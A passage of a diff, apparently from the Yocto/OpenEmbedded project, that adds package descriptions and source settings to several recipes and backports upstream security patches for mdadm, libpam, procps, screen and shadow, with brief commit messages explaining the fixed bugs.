44 | @@ -108,16 +107,13 @@ int Detail(char *dev, struct context *c) | ||
45 | sra->devs == NULL) { | ||
46 | pr_err("Array associated with md device %s does not exist.\n", | ||
47 | dev); | ||
48 | - close(fd); | ||
49 | - sysfs_free(sra); | ||
50 | - return rv; | ||
51 | + goto out; | ||
52 | } | ||
53 | array = sra->array; | ||
54 | } else { | ||
55 | pr_err("cannot get array detail for %s: %s\n", | ||
56 | dev, strerror(errno)); | ||
57 | - close(fd); | ||
58 | - return rv; | ||
59 | + goto out; | ||
60 | } | ||
61 | } | ||
62 | |||
63 | @@ -827,10 +823,12 @@ out: | ||
64 | close(fd); | ||
65 | free(subarray); | ||
66 | free(avail); | ||
67 | - for (d = 0; d < n_devices; d++) | ||
68 | - free(devices[d]); | ||
69 | + if (devices) | ||
70 | + for (d = 0; d < n_devices; d++) | ||
71 | + free(devices[d]); | ||
72 | free(devices); | ||
73 | sysfs_free(sra); | ||
74 | + free(st); | ||
75 | return rv; | ||
76 | } | ||
77 | |||
78 | -- | ||
79 | cgit | ||
80 | |||
diff --git a/meta/recipes-extended/mdadm/mdadm_4.1.bb b/meta/recipes-extended/mdadm/mdadm_4.1.bb index 001d3331a7..ca326fd1cb 100644 --- a/meta/recipes-extended/mdadm/mdadm_4.1.bb +++ b/meta/recipes-extended/mdadm/mdadm_4.1.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Tool for managing software RAID under Linux" | 1 | SUMMARY = "Tool for managing software RAID under Linux" |
2 | HOMEPAGE = "http://www.kernel.org/pub/linux/utils/raid/mdadm/" | 2 | HOMEPAGE = "http://www.kernel.org/pub/linux/utils/raid/mdadm/" |
3 | DESCRIPTION = "mdadm is a Linux utility used to manage and monitor software RAID devices." | ||
3 | 4 | ||
4 | # Some files are GPLv2+ while others are GPLv2. | 5 | # Some files are GPLv2+ while others are GPLv2. |
5 | LICENSE = "GPLv2 & GPLv2+" | 6 | LICENSE = "GPLv2 & GPLv2+" |
@@ -23,6 +24,8 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/utils/raid/mdadm/${BPN}-${PV}.tar.xz \ | |||
23 | file://0001-mdadm-add-option-y-for-use-syslog-to-recive-event-re.patch \ | 24 | file://0001-mdadm-add-option-y-for-use-syslog-to-recive-event-re.patch \ |
24 | file://include_sysmacros.patch \ | 25 | file://include_sysmacros.patch \ |
25 | file://0001-mdadm-skip-test-11spare-migration.patch \ | 26 | file://0001-mdadm-skip-test-11spare-migration.patch \ |
27 | file://CVE-2023-28736.patch \ | ||
28 | file://CVE-2023-28938.patch \ | ||
26 | " | 29 | " |
27 | 30 | ||
28 | SRC_URI[md5sum] = "51bf3651bd73a06c413a2f964f299598" | 31 | SRC_URI[md5sum] = "51bf3651bd73a06c413a2f964f299598" |
diff --git a/meta/recipes-extended/mingetty/mingetty_1.08.bb b/meta/recipes-extended/mingetty/mingetty_1.08.bb index 491b892093..9822e86b0e 100644 --- a/meta/recipes-extended/mingetty/mingetty_1.08.bb +++ b/meta/recipes-extended/mingetty/mingetty_1.08.bb | |||
@@ -1,6 +1,7 @@ | |||
1 | SUMMARY = "Compact getty terminal handler for virtual consoles only" | 1 | SUMMARY = "Compact getty terminal handler for virtual consoles only" |
2 | SECTION = "console/utils" | 2 | SECTION = "console/utils" |
3 | HOMEPAGE = "http://sourceforge.net/projects/mingetty/" | 3 | HOMEPAGE = "http://sourceforge.net/projects/mingetty/" |
4 | DESCRIPTION = "This is a small Linux console getty that is started on the Linux text console, asks for a login name and then tranfers over to login directory. Is extended to allow automatic login and starting any app." | ||
4 | LICENSE = "GPLv2" | 5 | LICENSE = "GPLv2" |
5 | PR = "r3" | 6 | PR = "r3" |
6 | 7 | ||
diff --git a/meta/recipes-extended/newt/libnewt_0.52.21.bb b/meta/recipes-extended/newt/libnewt_0.52.21.bb index 88b4cf4a03..3d35a17c92 100644 --- a/meta/recipes-extended/newt/libnewt_0.52.21.bb +++ b/meta/recipes-extended/newt/libnewt_0.52.21.bb | |||
@@ -29,7 +29,7 @@ SRC_URI[sha256sum] = "265eb46b55d7eaeb887fca7a1d51fe115658882dfe148164b6c49fccac | |||
29 | 29 | ||
30 | S = "${WORKDIR}/newt-${PV}" | 30 | S = "${WORKDIR}/newt-${PV}" |
31 | 31 | ||
32 | inherit autotools-brokensep python3native python3-dir | 32 | inherit autotools-brokensep python3native python3-dir python3targetconfig |
33 | 33 | ||
34 | EXTRA_OECONF = "--without-tcl --with-python" | 34 | EXTRA_OECONF = "--without-tcl --with-python" |
35 | 35 | ||
diff --git a/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch b/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch new file mode 100644 index 0000000000..33ac37b7f0 --- /dev/null +++ b/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch | |||
@@ -0,0 +1,59 @@ | |||
1 | From 031bb5a5d0d950253b68138b498dc93be69a64cb Mon Sep 17 00:00:00 2001 | ||
2 | From: Matthias Gerstner <matthias.gerstner@suse.de> | ||
3 | Date: Wed, 27 Dec 2023 14:01:59 +0100 | ||
4 | Subject: [PATCH] pam_namespace: protect_dir(): use O_DIRECTORY to prevent | ||
5 | local DoS situations | ||
6 | |||
7 | Without O_DIRECTORY the path crawling logic is subject to e.g. FIFOs | ||
8 | being placed in user controlled directories, causing the PAM module to | ||
9 | block indefinitely during `openat()`. | ||
10 | |||
11 | Pass O_DIRECTORY to cause the `openat()` to fail if the path does not | ||
12 | refer to a directory. | ||
13 | |||
14 | With this the check whether the final path element is a directory | ||
15 | becomes unnecessary, drop it. | ||
16 | |||
17 | Upstream-Status: Backport [https://github.com/linux-pam/linux-pam/commit/031bb5a5d0d950253b68138b498dc93be69a64cb] | ||
18 | CVE: CVE-2024-22365 | ||
19 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
20 | --- | ||
21 | modules/pam_namespace/pam_namespace.c | 18 +----------------- | ||
22 | 1 file changed, 1 insertion(+), 17 deletions(-) | ||
23 | |||
24 | diff --git a/modules/pam_namespace/pam_namespace.c b/modules/pam_namespace/pam_namespace.c | ||
25 | index 2528cff86..f72d67189 100644 | ||
26 | --- a/modules/pam_namespace/pam_namespace.c | ||
27 | +++ b/modules/pam_namespace/pam_namespace.c | ||
28 | @@ -1201,7 +1201,7 @@ static int protect_dir(const char *path, mode_t mode, int do_mkdir, | ||
29 | int dfd = AT_FDCWD; | ||
30 | int dfd_next; | ||
31 | int save_errno; | ||
32 | - int flags = O_RDONLY; | ||
33 | + int flags = O_RDONLY | O_DIRECTORY; | ||
34 | int rv = -1; | ||
35 | struct stat st; | ||
36 | |||
37 | @@ -1255,22 +1255,6 @@ static int protect_dir(const char *path, mode_t mode, int do_mkdir, | ||
38 | rv = openat(dfd, dir, flags); | ||
39 | } | ||
40 | |||
41 | - if (rv != -1) { | ||
42 | - if (fstat(rv, &st) != 0) { | ||
43 | - save_errno = errno; | ||
44 | - close(rv); | ||
45 | - rv = -1; | ||
46 | - errno = save_errno; | ||
47 | - goto error; | ||
48 | - } | ||
49 | - if (!S_ISDIR(st.st_mode)) { | ||
50 | - close(rv); | ||
51 | - errno = ENOTDIR; | ||
52 | - rv = -1; | ||
53 | - goto error; | ||
54 | - } | ||
55 | - } | ||
56 | - | ||
57 | if (flags & O_NOFOLLOW) { | ||
58 | /* we are inside user-owned dir - protect */ | ||
59 | if (protect_mount(rv, p, idata) == -1) { | ||
diff --git a/meta/recipes-extended/pam/libpam_1.3.1.bb b/meta/recipes-extended/pam/libpam_1.3.1.bb index bc72afe6ad..527a368e2d 100644 --- a/meta/recipes-extended/pam/libpam_1.3.1.bb +++ b/meta/recipes-extended/pam/libpam_1.3.1.bb | |||
@@ -24,6 +24,7 @@ SRC_URI = "https://github.com/linux-pam/linux-pam/releases/download/v${PV}/Linux | |||
24 | file://pam-security-abstract-securetty-handling.patch \ | 24 | file://pam-security-abstract-securetty-handling.patch \ |
25 | file://pam-unix-nullok-secure.patch \ | 25 | file://pam-unix-nullok-secure.patch \ |
26 | file://crypt_configure.patch \ | 26 | file://crypt_configure.patch \ |
27 | file://CVE-2024-22365.patch \ | ||
27 | " | 28 | " |
28 | 29 | ||
29 | SRC_URI[md5sum] = "558ff53b0fc0563ca97f79e911822165" | 30 | SRC_URI[md5sum] = "558ff53b0fc0563ca97f79e911822165" |
diff --git a/meta/recipes-extended/parted/parted_3.3.bb b/meta/recipes-extended/parted/parted_3.3.bb index aa4d8042cf..2d688c3700 100644 --- a/meta/recipes-extended/parted/parted_3.3.bb +++ b/meta/recipes-extended/parted/parted_3.3.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Disk partition editing/resizing utility" | 1 | SUMMARY = "Disk partition editing/resizing utility" |
2 | HOMEPAGE = "http://www.gnu.org/software/parted/parted.html" | 2 | HOMEPAGE = "http://www.gnu.org/software/parted/parted.html" |
3 | DESCRIPTION = "GNU Parted manipulates partition tables. This is useful for creating space for new operating systems, reorganizing disk usage, copying data on hard disks and disk imaging." | ||
3 | LICENSE = "GPLv3+" | 4 | LICENSE = "GPLv3+" |
4 | LIC_FILES_CHKSUM = "file://COPYING;md5=2f31b266d3440dd7ee50f92cf67d8e6c" | 5 | LIC_FILES_CHKSUM = "file://COPYING;md5=2f31b266d3440dd7ee50f92cf67d8e6c" |
5 | SECTION = "console/tools" | 6 | SECTION = "console/tools" |
diff --git a/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb b/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb index 9f992d3e83..409a8f3896 100644 --- a/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb +++ b/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb | |||
@@ -1,5 +1,7 @@ | |||
1 | SUMMARY = "Convert::ASN1 - Perl ASN.1 Encode/Decode library" | 1 | SUMMARY = "Convert::ASN1 - Perl ASN.1 Encode/Decode library" |
2 | SECTION = "libs" | 2 | SECTION = "libs" |
3 | HOMEPAGE = "https://metacpan.org/source/GBARR/Convert-ASN1-0.27" | ||
4 | DESCRIPTION = "Convert::ASN1 is a perl library for encoding/decoding data using ASN.1 definitions." | ||
3 | LICENSE = "Artistic-1.0 | GPL-1.0+" | 5 | LICENSE = "Artistic-1.0 | GPL-1.0+" |
4 | LIC_FILES_CHKSUM = "file://README.md;beginline=91;endline=97;md5=ceff7fd286eb6d8e8e0d3d23e096a63f" | 6 | LIC_FILES_CHKSUM = "file://README.md;beginline=91;endline=97;md5=ceff7fd286eb6d8e8e0d3d23e096a63f" |
5 | 7 | ||
diff --git a/meta/recipes-extended/perl/libtimedate-perl_2.30.bb b/meta/recipes-extended/perl/libtimedate-perl_2.30.bb index 7219c7d11e..068f0bd3f3 100644 --- a/meta/recipes-extended/perl/libtimedate-perl_2.30.bb +++ b/meta/recipes-extended/perl/libtimedate-perl_2.30.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Perl modules useful for manipulating date and time information" | 1 | SUMMARY = "Perl modules useful for manipulating date and time information" |
2 | HOMEPAGE = "https://metacpan.org/release/TimeDate" | 2 | HOMEPAGE = "https://metacpan.org/release/TimeDate" |
3 | DESCRIPTION = "This is the perl5 TimeDate distribution. It requires perl version 5.003 or later." | ||
3 | SECTION = "libs" | 4 | SECTION = "libs" |
4 | # You can redistribute it and/or modify it under the same terms as Perl itself. | 5 | # You can redistribute it and/or modify it under the same terms as Perl itself. |
5 | LICENSE = "Artistic-1.0 | GPL-1.0+" | 6 | LICENSE = "Artistic-1.0 | GPL-1.0+" |
diff --git a/meta/recipes-extended/procps/procps/CVE-2023-4016.patch b/meta/recipes-extended/procps/procps/CVE-2023-4016.patch new file mode 100644 index 0000000000..50582a8649 --- /dev/null +++ b/meta/recipes-extended/procps/procps/CVE-2023-4016.patch | |||
@@ -0,0 +1,85 @@ | |||
1 | From 2c933ecba3bb1d3041a5a7a53a7b4078a6003413 Mon Sep 17 00:00:00 2001 | ||
2 | From: Craig Small <csmall@dropbear.xyz> | ||
3 | Date: Thu, 10 Aug 2023 21:18:38 +1000 | ||
4 | Subject: [PATCH] ps: Fix possible buffer overflow in -C option | ||
5 | |||
6 | ps allocates memory using malloc(length of arg * len of struct). | ||
7 | In certain strange circumstances, the arg length could be very large | ||
8 | and the multiplecation will overflow, allocating a small amount of | ||
9 | memory. | ||
10 | |||
11 | Subsequent strncpy() will then write into unallocated memory. | ||
12 | The fix is to use calloc. It's slower but this is a one-time | ||
13 | allocation. Other malloc(x * y) calls have also been replaced | ||
14 | by calloc(x, y) | ||
15 | |||
16 | References: | ||
17 | https://www.freelists.org/post/procps/ps-buffer-overflow-CVE-20234016 | ||
18 | https://nvd.nist.gov/vuln/detail/CVE-2023-4016 | ||
19 | https://gitlab.com/procps-ng/procps/-/issues/297 | ||
20 | https://bugs.debian.org/1042887 | ||
21 | |||
22 | Signed-off-by: Craig Small <csmall@dropbear.xyz> | ||
23 | |||
24 | CVE: CVE-2023-4016 | ||
25 | Upstream-Status: Backport [https://gitlab.com/procps-ng/procps/-/commit/2c933ecba3bb1d3041a5a7a53a7b4078a6003413] | ||
26 | |||
27 | Signed-off-by: Peter Marko <peter.marko@siemens.com> | ||
28 | |||
29 | --- | ||
30 | NEWS | 1 + | ||
31 | ps/parser.c | 8 ++++---- | ||
32 | 2 files changed, 5 insertions(+), 4 deletions(-) | ||
33 | |||
34 | diff --git a/NEWS b/NEWS | ||
35 | index b9509734..64fa3da8 100644 | ||
36 | --- a/NEWS | ||
37 | +++ b/NEWS | ||
38 | @@ -1,3 +1,5 @@ | ||
39 | + * ps: Fix buffer overflow in -C option CVE-2023-4016 Debian #1042887, issue #297 | ||
40 | + | ||
41 | procps-ng-3.3.16 | ||
42 | ---------------- | ||
43 | * library: Increment to 8:2:0 | ||
44 | diff --git a/ps/parser.c b/ps/parser.c | ||
45 | index 248aa741..15873dfa 100644 | ||
46 | --- a/ps/parser.c | ||
47 | +++ b/ps/parser.c | ||
48 | @@ -184,7 +184,6 @@ static const char *parse_list(const char *arg, const char *(*parse_fn)(char *, s | ||
49 | const char *err; /* error code that could or did happen */ | ||
50 | /*** prepare to operate ***/ | ||
51 | node = malloc(sizeof(selection_node)); | ||
52 | - node->u = malloc(strlen(arg)*sizeof(sel_union)); /* waste is insignificant */ | ||
53 | node->n = 0; | ||
54 | buf = strdup(arg); | ||
55 | /*** sanity check and count items ***/ | ||
56 | @@ -205,6 +204,7 @@ static const char *parse_list(const char *arg, const char *(*parse_fn)(char *, s | ||
57 | } while (*++walk); | ||
58 | if(need_item) goto parse_error; | ||
59 | node->n = items; | ||
60 | + node->u = calloc(items, sizeof(sel_union)); | ||
61 | /*** actually parse the list ***/ | ||
62 | walk = buf; | ||
63 | while(items--){ | ||
64 | @@ -1031,15 +1031,15 @@ static const char *parse_trailing_pids(void){ | ||
65 | thisarg = ps_argc - 1; /* we must be at the end now */ | ||
66 | |||
67 | pidnode = malloc(sizeof(selection_node)); | ||
68 | - pidnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */ | ||
69 | + pidnode->u = calloc(i, sizeof(sel_union)); /* waste is insignificant */ | ||
70 | pidnode->n = 0; | ||
71 | |||
72 | grpnode = malloc(sizeof(selection_node)); | ||
73 | - grpnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */ | ||
74 | + grpnode->u = calloc(i,sizeof(sel_union)); /* waste is insignificant */ | ||
75 | grpnode->n = 0; | ||
76 | |||
77 | sidnode = malloc(sizeof(selection_node)); | ||
78 | - sidnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */ | ||
79 | + sidnode->u = calloc(i, sizeof(sel_union)); /* waste is insignificant */ | ||
80 | sidnode->n = 0; | ||
81 | |||
82 | while(i--){ | ||
83 | -- | ||
84 | GitLab | ||
85 | |||
diff --git a/meta/recipes-extended/procps/procps_3.3.16.bb b/meta/recipes-extended/procps/procps_3.3.16.bb index 2810ebd285..ac27734a6f 100644 --- a/meta/recipes-extended/procps/procps_3.3.16.bb +++ b/meta/recipes-extended/procps/procps_3.3.16.bb | |||
@@ -12,8 +12,9 @@ DEPENDS = "ncurses" | |||
12 | 12 | ||
13 | inherit autotools gettext pkgconfig update-alternatives | 13 | inherit autotools gettext pkgconfig update-alternatives |
14 | 14 | ||
15 | SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https \ | 15 | SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https;branch=master \ |
16 | file://sysctl.conf \ | 16 | file://sysctl.conf \ |
17 | file://CVE-2023-4016.patch \ | ||
17 | " | 18 | " |
18 | SRCREV = "59c88e18f29000ceaf7e5f98181b07be443cf12f" | 19 | SRCREV = "59c88e18f29000ceaf7e5f98181b07be443cf12f" |
19 | 20 | ||
diff --git a/meta/recipes-extended/psmisc/psmisc_23.3.bb b/meta/recipes-extended/psmisc/psmisc_23.3.bb index e569f1074b..36e6775f9e 100644 --- a/meta/recipes-extended/psmisc/psmisc_23.3.bb +++ b/meta/recipes-extended/psmisc/psmisc_23.3.bb | |||
@@ -2,7 +2,7 @@ require psmisc.inc | |||
2 | LICENSE = "GPLv2" | 2 | LICENSE = "GPLv2" |
3 | LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3" | 3 | LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3" |
4 | 4 | ||
5 | SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https \ | 5 | SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https;branch=master \ |
6 | file://0001-Use-UINTPTR_MAX-instead-of-__WORDSIZE.patch \ | 6 | file://0001-Use-UINTPTR_MAX-instead-of-__WORDSIZE.patch \ |
7 | " | 7 | " |
8 | SRCREV = "78bde849041e6c914a2a517ebe1255b86dc98772" | 8 | SRCREV = "78bde849041e6c914a2a517ebe1255b86dc98772" |
diff --git a/meta/recipes-extended/quota/quota_4.05.bb b/meta/recipes-extended/quota/quota_4.05.bb index c5da1e71ed..46ad7352d6 100644 --- a/meta/recipes-extended/quota/quota_4.05.bb +++ b/meta/recipes-extended/quota/quota_4.05.bb | |||
@@ -1,6 +1,7 @@ | |||
1 | SUMMARY = "Tools for monitoring & limiting user disk usage per filesystem" | 1 | SUMMARY = "Tools for monitoring & limiting user disk usage per filesystem" |
2 | SECTION = "base" | 2 | SECTION = "base" |
3 | HOMEPAGE = "http://sourceforge.net/projects/linuxquota/" | 3 | HOMEPAGE = "http://sourceforge.net/projects/linuxquota/" |
4 | DESCRIPTION = "Tools and patches for the Linux Diskquota system as part of the Linux kernel" | ||
4 | BUGTRACKER = "http://sourceforge.net/tracker/?group_id=18136&atid=118136" | 5 | BUGTRACKER = "http://sourceforge.net/tracker/?group_id=18136&atid=118136" |
5 | LICENSE = "BSD & GPLv2+ & LGPLv2.1+" | 6 | LICENSE = "BSD & GPLv2+ & LGPLv2.1+" |
6 | LIC_FILES_CHKSUM = "file://rquota_server.c;beginline=1;endline=20;md5=fe7e0d7e11c6f820f8fa62a5af71230f \ | 7 | LIC_FILES_CHKSUM = "file://rquota_server.c;beginline=1;endline=20;md5=fe7e0d7e11c6f820f8fa62a5af71230f \ |
diff --git a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb index cb5b288c48..0f8a6f74f8 100644 --- a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb +++ b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb | |||
@@ -19,7 +19,7 @@ PV = "1.4+git${SRCPV}" | |||
19 | 19 | ||
20 | SRCREV = "9bc3b5b785723cfff459b0c01b39d87d4bed975c" | 20 | SRCREV = "9bc3b5b785723cfff459b0c01b39d87d4bed975c" |
21 | 21 | ||
22 | SRC_URI = "git://github.com/thkukuk/${BPN} \ | 22 | SRC_URI = "git://github.com/thkukuk/${BPN};branch=master;protocol=https \ |
23 | file://0001-Use-cross-compiled-rpcgen.patch \ | 23 | file://0001-Use-cross-compiled-rpcgen.patch \ |
24 | " | 24 | " |
25 | 25 | ||
diff --git a/meta/recipes-extended/screen/screen/CVE-2021-26937.patch b/meta/recipes-extended/screen/screen/CVE-2021-26937.patch new file mode 100644 index 0000000000..983b35c1b0 --- /dev/null +++ b/meta/recipes-extended/screen/screen/CVE-2021-26937.patch | |||
@@ -0,0 +1,68 @@ | |||
1 | Description: [CVE-2021-26937] Fix out of bounds array access | ||
2 | Author: Michael Schröder <mls@suse.de> | ||
3 | Bug-Debian: https://bugs.debian.org/982435 | ||
4 | Bug: https://savannah.gnu.org/bugs/?60030 | ||
5 | Bug: https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00000.html | ||
6 | Bug-OSS-Security: https://www.openwall.com/lists/oss-security/2021/02/09/3 | ||
7 | Origin: https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00010.html | ||
8 | |||
9 | CVE: CVE-2021-26937 | ||
10 | Upstream-Status: Pending | ||
11 | Signed-off-by: Scott Murray <scott.murray@konsulko.com> | ||
12 | |||
13 | --- a/encoding.c | ||
14 | +++ b/encoding.c | ||
15 | @@ -43,7 +43,7 @@ | ||
16 | # ifdef UTF8 | ||
17 | static int recode_char __P((int, int, int)); | ||
18 | static int recode_char_to_encoding __P((int, int)); | ||
19 | -static void comb_tofront __P((int, int)); | ||
20 | +static void comb_tofront __P((int)); | ||
21 | # ifdef DW_CHARS | ||
22 | static int recode_char_dw __P((int, int *, int, int)); | ||
23 | static int recode_char_dw_to_encoding __P((int, int *, int)); | ||
24 | @@ -1263,6 +1263,8 @@ | ||
25 | {0x30000, 0x3FFFD}, | ||
26 | }; | ||
27 | |||
28 | + if (c >= 0xdf00 && c <= 0xdfff) | ||
29 | + return 1; /* dw combining sequence */ | ||
30 | return ((bisearch(c, wide, sizeof(wide) / sizeof(struct interval) - 1)) || | ||
31 | (cjkwidth && | ||
32 | bisearch(c, ambiguous, | ||
33 | @@ -1330,11 +1332,12 @@ | ||
34 | } | ||
35 | |||
36 | static void | ||
37 | -comb_tofront(root, i) | ||
38 | -int root, i; | ||
39 | +comb_tofront(i) | ||
40 | +int i; | ||
41 | { | ||
42 | for (;;) | ||
43 | { | ||
44 | + int root = i >= 0x700 ? 0x801 : 0x800; | ||
45 | debug1("bring to front: %x\n", i); | ||
46 | combchars[combchars[i]->prev]->next = combchars[i]->next; | ||
47 | combchars[combchars[i]->next]->prev = combchars[i]->prev; | ||
48 | @@ -1396,9 +1399,9 @@ | ||
49 | { | ||
50 | /* full, recycle old entry */ | ||
51 | if (c1 >= 0xd800 && c1 < 0xe000) | ||
52 | - comb_tofront(root, c1 - 0xd800); | ||
53 | + comb_tofront(c1 - 0xd800); | ||
54 | i = combchars[root]->prev; | ||
55 | - if (c1 == i + 0xd800) | ||
56 | + if (i == 0x800 || i == 0x801 || c1 == i + 0xd800) | ||
57 | { | ||
58 | /* completely full, can't recycle */ | ||
59 | debug("utf8_handle_comp: completely full!\n"); | ||
60 | @@ -1422,7 +1425,7 @@ | ||
61 | mc->font = (i >> 8) + 0xd8; | ||
62 | mc->fontx = 0; | ||
63 | debug3("combinig char %x %x -> %x\n", c1, c, i + 0xd800); | ||
64 | - comb_tofront(root, i); | ||
65 | + comb_tofront(i); | ||
66 | } | ||
67 | |||
68 | #else /* !UTF8 */ | ||
diff --git a/meta/recipes-extended/screen/screen/CVE-2023-24626.patch b/meta/recipes-extended/screen/screen/CVE-2023-24626.patch new file mode 100644 index 0000000000..73caf9d81b --- /dev/null +++ b/meta/recipes-extended/screen/screen/CVE-2023-24626.patch | |||
@@ -0,0 +1,40 @@ | |||
1 | From e9ad41bfedb4537a6f0de20f00b27c7739f168f7 Mon Sep 17 00:00:00 2001 | ||
2 | From: Alexander Naumov <alexander_naumov@opensuse.org> | ||
3 | Date: Mon, 30 Jan 2023 17:22:25 +0200 | ||
4 | Subject: fix: missing signal sending permission check on failed query messages | ||
5 | |||
6 | Signed-off-by: Alexander Naumov <alexander_naumov@opensuse.org> | ||
7 | |||
8 | CVE: CVE-2023-24626 | ||
9 | Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/screen.git/commit/?id=e9ad41bfedb4537a6f0de20f00b27c7739f168f7] | ||
10 | Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> | ||
11 | --- | ||
12 | socket.c | 9 +++++++-- | ||
13 | 1 file changed, 7 insertions(+), 2 deletions(-) | ||
14 | |||
15 | diff --git a/socket.c b/socket.c | ||
16 | index bb68b35..9d87445 100644 | ||
17 | --- a/socket.c | ||
18 | +++ b/socket.c | ||
19 | @@ -1285,11 +1285,16 @@ ReceiveMsg() | ||
20 | else | ||
21 | queryflag = -1; | ||
22 | |||
23 | - Kill(m.m.command.apid, | ||
24 | + if (CheckPid(m.m.command.apid)) { | ||
25 | + Msg(0, "Query attempt with bad pid(%d)!", m.m.command.apid); | ||
26 | + } | ||
27 | + else { | ||
28 | + Kill(m.m.command.apid, | ||
29 | (queryflag >= 0) | ||
30 | ? SIGCONT | ||
31 | : SIG_BYE); /* Send SIG_BYE if an error happened */ | ||
32 | - queryflag = -1; | ||
33 | + queryflag = -1; | ||
34 | + } | ||
35 | } | ||
36 | break; | ||
37 | case MSG_COMMAND: | ||
38 | -- | ||
39 | 2.25.1 | ||
40 | |||
diff --git a/meta/recipes-extended/screen/screen_4.8.0.bb b/meta/recipes-extended/screen/screen_4.8.0.bb index 4772eb6c7a..c4faa27023 100644 --- a/meta/recipes-extended/screen/screen_4.8.0.bb +++ b/meta/recipes-extended/screen/screen_4.8.0.bb | |||
@@ -21,6 +21,8 @@ SRC_URI = "${GNU_MIRROR}/screen/screen-${PV}.tar.gz \ | |||
21 | file://0002-comm.h-now-depends-on-term.h.patch \ | 21 | file://0002-comm.h-now-depends-on-term.h.patch \ |
22 | file://0001-fix-for-multijob-build.patch \ | 22 | file://0001-fix-for-multijob-build.patch \ |
23 | file://0001-Remove-more-compatibility-stuff.patch \ | 23 | file://0001-Remove-more-compatibility-stuff.patch \ |
24 | file://CVE-2021-26937.patch \ | ||
25 | file://CVE-2023-24626.patch \ | ||
24 | " | 26 | " |
25 | 27 | ||
26 | SRC_URI[md5sum] = "d276213d3acd10339cd37848b8c4ab1e" | 28 | SRC_URI[md5sum] = "d276213d3acd10339cd37848b8c4ab1e" |
diff --git a/meta/recipes-extended/sed/sed_4.8.bb b/meta/recipes-extended/sed/sed_4.8.bb index 39e3a61df5..089bd11a55 100644 --- a/meta/recipes-extended/sed/sed_4.8.bb +++ b/meta/recipes-extended/sed/sed_4.8.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Stream EDitor (text filtering utility)" | 1 | SUMMARY = "Stream EDitor (text filtering utility)" |
2 | HOMEPAGE = "http://www.gnu.org/software/sed/" | 2 | HOMEPAGE = "http://www.gnu.org/software/sed/" |
3 | DESCRIPTION = "sed (stream editor) is a non-interactive command-line text editor." | ||
3 | LICENSE = "GPLv3+" | 4 | LICENSE = "GPLv3+" |
4 | LIC_FILES_CHKSUM = "file://COPYING;md5=c678957b0c8e964aa6c70fd77641a71e \ | 5 | LIC_FILES_CHKSUM = "file://COPYING;md5=c678957b0c8e964aa6c70fd77641a71e \ |
5 | file://sed/sed.h;beginline=1;endline=15;md5=fb3c7e6fbca6f66943859153d4be8efe \ | 6 | file://sed/sed.h;beginline=1;endline=15;md5=fb3c7e6fbca6f66943859153d4be8efe \ |
diff --git a/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch b/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch new file mode 100644 index 0000000000..aea07ff361 --- /dev/null +++ b/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch | |||
@@ -0,0 +1,66 @@ | |||
1 | From 2eaea70111f65b16d55998386e4ceb4273c19eb4 Mon Sep 17 00:00:00 2001 | ||
2 | From: =?UTF-8?q?Christian=20G=C3=B6ttsche?= <cgzones@googlemail.com> | ||
3 | Date: Fri, 31 Mar 2023 14:46:50 +0200 | ||
4 | Subject: [PATCH] Overhaul valid_field() | ||
5 | |||
6 | e5905c4b ("Added control character check") introduced checking for | ||
7 | control characters but had the logic inverted, so it rejects all | ||
8 | characters that are not control ones. | ||
9 | |||
10 | Cast the character to `unsigned char` before passing to the character | ||
11 | checking functions to avoid UB. | ||
12 | |||
13 | Use strpbrk(3) for the illegal character test and return early. | ||
14 | |||
15 | Upstream-Status: Backport [https://github.com/shadow-maint/shadow/commit/2eaea70111f65b16d55998386e4ceb4273c19eb4] | ||
16 | |||
17 | Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com> | ||
18 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
19 | --- | ||
20 | lib/fields.c | 24 ++++++++++-------------- | ||
21 | 1 file changed, 10 insertions(+), 14 deletions(-) | ||
22 | |||
23 | diff --git a/lib/fields.c b/lib/fields.c | ||
24 | index fb51b582..53929248 100644 | ||
25 | --- a/lib/fields.c | ||
26 | +++ b/lib/fields.c | ||
27 | @@ -37,26 +37,22 @@ int valid_field (const char *field, const char *illegal) | ||
28 | |||
29 | /* For each character of field, search if it appears in the list | ||
30 | * of illegal characters. */ | ||
31 | + if (illegal && NULL != strpbrk (field, illegal)) { | ||
32 | + return -1; | ||
33 | + } | ||
34 | + | ||
35 | + /* Search if there are non-printable or control characters */ | ||
36 | for (cp = field; '\0' != *cp; cp++) { | ||
37 | - if (strchr (illegal, *cp) != NULL) { | ||
38 | + unsigned char c = *cp; | ||
39 | + if (!isprint (c)) { | ||
40 | + err = 1; | ||
41 | + } | ||
42 | + if (iscntrl (c)) { | ||
43 | err = -1; | ||
